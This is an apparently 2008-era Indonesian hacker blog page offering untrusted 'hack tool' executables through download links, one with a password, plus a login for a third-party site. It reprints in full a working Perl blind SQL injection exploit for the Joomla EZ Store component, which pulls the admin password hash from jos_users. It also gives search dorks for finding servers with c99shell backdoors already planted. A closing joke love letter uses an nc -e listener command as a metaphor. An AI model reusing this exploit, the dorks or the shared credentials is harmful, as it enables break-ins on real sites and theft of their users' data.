i am back again
#4x0r5 tool(beta)
buat yang bingung tulisan apaan neeh
neh tul hack gabungan dari gw, 90% udah live jadi nggak usah diinstall
cukup di extract aja, maaf bind ini lom gw sempurnain (masih beta)
bentuknya sama kek yud1z hacktool 2008 jadi nggak usah bingung
klo gitu
masih beta neeh, di mohon komennya tuk menyempurnakan
oh ya semuanya gw compress 7z bukanya pake PEA zip dah ada di folder archiver
http://rapidshare.com/files/142764088/_4x0r5.exe
ten kyu
greetz to:
panther ranger crew
blackhat
hack & destroy
tul lagi neeh
aio
hack & destroy tahun 2007, mang udah lama sich, tapi inget kenangan masa lampau
http://rapidshare.com/files/138241776/hack_destroy.exe
sorry nggak ada screenshot, yud1z lagi malez soalnya udah nggak punya kerjaan
Hacking Joomla Component “EZ Store”
hajar jooomla neeh, pake teknik Remote Blind SQL Injection Exploit, trus tinggal compile deh
#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # #\n";
print " # Dork: inurl:com_ezstore #\n";
print " # Usage: perl ezstore.pl host path <options> #\n";
print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid procuct id #\n";
print " # -c Category value of the following product id #\n";
print " ################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $pid = $ARGV[3];
my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");
print "[~] Exploiting...\n";
if($options{"c"})
{
$cid = $options{"c"};
}
if($options{"p"})
{
$pid = $options{"p"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $pid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"x"})
{
$ua->proxy('http', "http://".$options{"x"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-08-03]
donlot di rapidshare
buat yang bingung cara donlot rapidshare
ada rapidleech neeh
http://www.christopheracademy.com/images/.system/kambe username : kambe password : newbee
hack tool 2008
hackerz tool nih gw bind sendiri
http://rapidshare.com/files/136695327/yud1z_hacktool_2008.exe.html
passs : tigatiga
list shell backdoor baru lagi
33 28.45% powered by captain crunch security team
6 5.17% safe-mode: off (not secure)
5 4.31% home
4 3.45% basel 2.2
4 3.45% safe-mode: off (not secure) drwxrwxrwx
3 2.59% c99memoryl
3 2.59% c99shell [file on secure ok ]
3 2.59% c99shell v. 1.0 pre-release build #16
3 2.59% hacker
3 2.59% uid=99(nobody) gid=99(nobody) groups=99(nobody)
2 1.72% --[ c99shell v. 1.0 pre-release build #16
2 1.72% basel
2 1.72% c99shell v. 1.0 pre-release build
2 1.72% powered by captain crunch security team | http://ccteam.ru |
2 1.72% safe-mode : off ( not secured ) drwxrwxrwx
2 1.72% safe-mode: off (not secure) drwxrwxrwx c99shell
1 0.86% !c99shell v. 1.0 pre-release build #16!
1 0.86% --[ c99shell v. 1.0 pre-release build
1 0.86% -[ c99shell v. 1.0 pre-release build #16 powered by captain cru
1 0.86% /opt/zope/lib/python/zdaemon/zdrun.py
1 0.86% allintext:â€safe-mode: off (not secure)â€
1 0.86% allinurl:selfremove
1 0.86% basel documentation
1 0.86% c99memory.php
1 0.86% c99shell safe-mode : off ( not secured ) drwxrwxrwx
1 0.86% c99shell v. 1.0 pre-release build #16 powered by captain crunch
1 0.86% c99shell v. 1.0 pre-release uname
1 0.86% c99shell v. pre-release build
1 0.86% captain crunch security team
1 0.86% code safe-mode: off (not secure) drwxrwxrwx c99shell
1 0.86% drwxrwxrwx c99shell filetype:php
1 0.86% encoder bind proc. ftp brute sec. sql php-code feedback self re
1 0.86% encoder tools proc. ftp brute sec. sql php-code update feedback
1 0.86% home updir search buffer tools proc ftp brute sec sql self remo
1 0.86% how to restore using !c99memory v. 1.0 pre-release build #16!
1 0.86% intext:c99memory v. 1.0
1 0.86% intext:safe-mode: off (not secure)
1 0.86% intext:safe-mode: off (not secure) tooling
1 0.86% inurl:act=sql
1 0.86% name asc. size · modify · owner/group · perms action
1 0.86% php safe-mode drwxrwxrwx
1 0.86% php4 timezone database
1 0.86% powered by captain crunch security team drwxrwxrwx
1 0.86% powered by captain crunch security team | http://ccteam.ru
1 0.86% safe mode: off ( not secure )
1 0.86% safe mode: off (not secure)
1 0.86% safe-mode: off (not secure) / tmp/ drwxrwxrwx
1 0.86% safe-mode: off (not secure) site:pt
1 0.86% shell powered by captain crunch security team
1 0.86% site:www.astro.mat.uc.pt basel
1 0.86% uid= gid= groups= sql uname -a
1 0.86% uid=99 ( nobody ) gid=99 ( nobody )
1 0.86% uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off (
Surat Cinta Seorang Hacker
Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!
Seandainya hatimu adalah sebuah system, ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.
Seandainya hatimu adalah sebuah system, saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.
Seandainya hatimu adalah sebuah system, jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.
Seandainya hatimu adalah sebuah system, …?
Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan systemku! Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.
wekz……..
